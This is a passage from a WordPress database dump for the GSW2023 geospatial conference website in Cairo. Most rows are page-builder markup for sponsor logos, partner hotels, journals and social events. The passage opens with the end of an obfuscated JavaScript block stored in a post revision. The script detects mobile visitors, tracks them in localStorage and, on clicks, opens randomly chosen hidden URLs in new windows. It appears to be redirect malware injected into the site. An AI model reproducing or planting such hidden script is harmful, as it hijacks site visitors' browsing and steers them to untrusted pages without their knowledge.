)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:51:47','2023-08-13 03:51:47','',3066,'https://gsw2023.com/?p=5097',0,'revision','',0),
(5098,1,'2023-08-13 03:53:16','2023-08-13 03:53:16','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 140px !important;}\"]\r\n\r\n<img class=\"alignnone wp-image-5093 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 95px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and 